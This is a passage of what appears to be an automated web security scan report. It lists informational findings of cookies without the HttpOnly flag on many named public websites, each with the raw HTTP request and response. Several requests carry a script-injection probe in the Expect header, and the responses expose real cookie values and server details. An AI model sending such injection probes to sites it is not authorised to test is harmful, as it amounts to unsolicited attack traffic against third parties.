Cache-control: no-cache="set-cookie"
Content-Type: image/x-icon
Date: Tue, 03 May 2011 10:44:19 GMT
ETag: "750668-c7b8-49761d66e0900"
Last-Modified: Tue, 14 Dec 2010 17:06:12 GMT
Server: Apache/2.2.12 (Ubuntu)
Set-Cookie: AWSELB=C5C37DB4894441DF66FD72C64D274A588833AFC8D94A0CA91455EDB540ED58B0B8EC5D9B3D36641A63F74DEFFFDD16C963482874F2F701B07BDA5FB87E03BDAE2E1BB688;MAX-AGE=3600
Content-Length: 51128
Connection: keep-alive

.PNG
.
...IHDR................a....sBIT....|.d.... pHYs...........~.....tEXtSoftware.Adobe Fireworks CS5q..6....tEXtCreation Time.12/14/10..yq...gprVWx..[.n....Y..jz,Z"....D..98!.8...m...b.. ......H
...[SNIP]...

13.174. http://www.indthegap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.indthegap.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90plan=R1531014639; path=/; expires=Thu, 05-May-2011 23:19:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.indthegap.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: 90plan=R1531014639; path=/; expires=Thu, 05-May-2011 23:19:41 GMT
Date: Tue, 03 May 2011 11:03:45 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.175. http://www.ipipeline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ipipeline.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WEBTRENDS_ID=173.193.214.243-1304418785.733575::534191671C31E1442EFE7FF35981B2B0; expires=Fri, 30-Apr-2021 10:33:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ipipeline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:05 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1304418785.733575::534191671C31E1442EFE7FF35981B2B0; expires=Fri, 30-Apr-2021 10:33:05 GMT; path=/
Last-Modified: Thu, 30 Sep 2010 21:02:14 GMT
ETag: "18c40e-47e-6473e180"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

13.176. http://www.itsmarta.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itsmarta.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpreview-pool=251729324.36895.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.itsmarta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1406
Content-Type: image/x-icon
Content-Location: http://www.itsmarta.com/favicon.ico
Last-Modified: Tue, 27 Jan 2009 22:17:52 GMT
Accept-Ranges: bytes
ETag: "9c6dd418cd80c91:11e0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:11 GMT
Set-Cookie: BIGipServerpreview-pool=251729324.36895.0000; path=/

..............h.......(....... ...........@.......................................................................k...H...%............z...b...Js..2P.............k...Hs..%W...U...I...=...1...%s...P...
...[SNIP]...

13.177. http://www.jjc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jjc.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerjjc.edu=364773386.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jjc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 1203
Server: Microsoft-IIS/7.0
Exires: Mon, 18 Apr 2011 10:58:26 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:58:26 GMT
Set-Cookie: BIGipServerjjc.edu=364773386.20480.0000; path=/



<html>
<head>
<meta http-equiv="refresh" content="0; url=/site-info/pages/error.aspx" />
</head>
<body>
404 Error - Page Not Found<br />
...[SNIP]...

13.178. http://www.kjct8.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kjct8.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

alpha=3dce8f18440b0000eee0bf4de6fe01008a800200; expires=Fri, 30-Apr-2021 11:03:10 GMT; path=/; domain=.kjct8.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kjct8.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.179. http://www.ksfcu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ksfcu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwwwpool=LDz7P/Ebv7HiK6ewBiFEQBRnhX3bBOo8+0sc+IUfn5qEjySGG5qbErQuzxZ0XgwHLgX1GOb4WWFScw==; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ksfcu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 2690
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:26:01 GMT
Set-Cookie: BIGipServerwwwpool=LDz7P/Ebv7HiK6ewBiFEQBRnhX3bBOo8+0sc+IUfn5qEjySGG5qbErQuzxZ0XgwHLgX1GOb4WWFScw==; path=/

<html>
<head>
   <title>Kern Schools Federal Credit Union</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <link rel="stylesheet" type="text/css" href="/fnf/Conta
...[SNIP]...

13.180. http://www.lacounty.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lacounty.info
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=NKQRYNS10.48.134.61CKMOK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lacounty.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=NKQRYNS10.48.134.61CKMOK; path=/
accept-ranges: bytes
content-length: 1135
content-type: text/html
date: Tue, 03 May 2011 11:02:30 GMT
etag: "1ee471-46f-d7b0fb00"
last-modified: Thu, 27 Nov 2008 02:53:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

13.181. http://www.lasvegasshows.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lasvegasshows.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-bghfahco=BC3E4A114CE30EBF57C561AF26C72A2D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lasvegasshows.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: X-Mapping-bghfahco=BC3E4A114CE30EBF57C561AF26C72A2D; path=/
Content-Length: 1245
Date: Tue, 03 May 2011 10:51:31 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

13.182. http://www.learnatest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.learnatest.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_80_LAT=1241622720.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.learnatest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: Private
Content-Length: 766
Content-Type: image/x-icon
Content-Location: http://www.learnatest.com/favicon.ico
Expires: Now
Last-Modified: Fri, 09 Mar 2001 23:25:42 GMT
Accept-Ranges: bytes
ETag: "0dfa42f0a8c01:11e0"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:23:06 GMT
Set-Cookie: BIGipServerhttp_80_LAT=1241622720.20480.0000; path=/

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

13.183. http://www.livingwithout.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livingwithout.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a011349=a011064:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingwithout.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:57:20 GMT
Server: Apache/2
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a011349=a011064:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.184. http://www.locox.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.locox.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NS_VER=2010.2.0; domain=www.locox.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.locox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:29 GMT
Server: Apache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: -691420514:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.locox.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: image/x-icon

13.185. http://www.mailfromftd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mailfromftd.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com
TLTUID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.186. http://www.make-life-easier.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.make-life-easier.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_nblf-mjgf-fbtjfs_80=ffffffff09c9397e45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:13:10 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.make-life-easier.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:20:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k DAV/2 Resin/3.0.14
Content-Length: 526
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_nblf-mjgf-fbtjfs_80=ffffffff09c9397e45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:13:10 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.187. http://www.mem.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mem.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Kouok4l23n=MDAwM2IyNGVlZmMwMDAwMDAwMDgwZhktDFcxMzE2OTI3MjUx;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mem.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Kouok4l23n=MDAwM2IyNGVlZmMwMDAwMDAwMDgwZhktDFcxMzE2OTI3MjUx;path=/
Cache-Control: max-age=86400
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Mon, 14 Mar 2011 13:30:37 GMT
Accept-Ranges: bytes
ETag: "17671014ce2cb1:2163"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:14:28 GMT

..............h.......(....... ...........@...................0.......0.../......./.../......./.../...ITN.ITM.HTO.JUL.JTL.JTN.JUM.JSN.HTN.[3..e?".........nL2.Z3..Z3...r^.a<..Y3..]6..........xY@.Y2...b
...[SNIP]...

13.188. http://www.michie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.michie.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerlng-ln-michie-http-25577=841011210.59747.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: www.michie.com 9999
Date: Tue, 03 May 2011 10:22:24 GMT
X-Cnection: close
Content-Length: 4040
Content-Type: text/html
Set-Cookie: BIGipServerlng-ln-michie-http-25577=841011210.59747.0000; path=/
X-RE-Ref: 1 -2077508254
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
...[SNIP]...

13.189. http://www.microsofthup.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsofthup.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-dc20-c3-commerce5-pod1-pool4=3087143946.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.microsofthup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:26:05 GMT
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server-Name: dc20gtweb02
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
Via: 1.1 DC20-CACHE02 (NetCache NetApp/6.0.5)
Set-Cookie: BIGipServerp-dc20-c3-commerce5-pod1-pool4=3087143946.20480.0000; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.190. http://www.monsterjam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monsterjam.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.monsterjam.com&SiteLanguage=1033; path=/
EktGUID=dae734e6-96d4-47e4-a51b-5526701f5c81; expires=Thu, 03-May-2012 10:44:49 GMT; path=/
EkAnalytics=newuser; expires=Thu, 03-May-2012 10:44:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.monsterjam.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.monsterjam.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=dae734e6-96d4-47e4-a51b-5526701f5c81; expires=Thu, 03-May-2012 10:44:49 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Thu, 03-May-2012 10:44:49 GMT; path=/
Set-Cookie: ASP.NET_SessionId=n1gqgrkxxbx41sv2sbyaqh52; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:49 GMT
Content-Length: 18205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="headTag"><base h
...[SNIP]...

13.191. http://www.movieretriever.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.movieretriever.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServervideohound=2282791434.24098.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.movieretriever.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:06:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8a
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServervideohound=2282791434.24098.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.192. http://www.mychasebonus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mychasebonus.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=OVMPLYS727Bec7OCKKLW; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mychasebonus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 18 Mar 2011 15:23:22 GMT
Accept-Ranges: bytes
ETag: "1619f66a80e5cb1:d6cc"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:10 GMT

..............h.......(....... .............................................f.Z .Z .Z .Z .Z .d...........................f.Z .Z .Z .Z .Z .Z .Z ....y7.................f.Z .Z .Z .Z .Z .Z .Z .Z ....Z ..V
...[SNIP]...

13.193. http://www.myeecu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myeecu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1304417874314639; path=/; expires=Fri, 30-Apr-21 10:17:54 GMT; domain=.myeecu.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myeecu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.194. http://www.myleather.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myleather.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjqqh_nzmfbuifs.dpn=ffffffff09091c2845525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 12:00:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myleather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
ETag: W/"318-1189016426000"
Last-Modified: Wed, 05 Sep 2007 18:20:26 GMT
Content-Length: 318
Date: Tue, 03 May 2011 11:00:39 GMT
Set-Cookie: NSC_wjqqh_nzmfbuifs.dpn=ffffffff09091c2845525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 12:00:40 GMT;path=/

..............(.......(....... ...................................dyh.GaL.9T>.....*H1.........VmZ......<#............................................................y...
...............z.......z......
...[SNIP]...

13.195. http://www.noisecreep.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.noisecreep.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:10:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noisecreep.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:10:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:10:56 GMT; path=/
Content-Length: 0
Content-Type: text/html

13.196. http://www.northstarmls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.northstarmls.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BALANCEID=balancer.www1; path=/; domain=.northstarmls.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northstarmls.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.197. http://www.nwahomepage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nwahomepage.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerDallasPool=362156042.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nwahomepage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:05:46 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 474
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerDallasPool=362156042.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.198. http://www.occasions365.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.occasions365.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PSGUID=77c0faeb-bc42-4852-b207-eafe636ed3da; expires=Thu, 02-Jun-2011 10:39:28 GMT; path=/
BIGipServerWEBFX-2=1426209802.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.occasions365.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

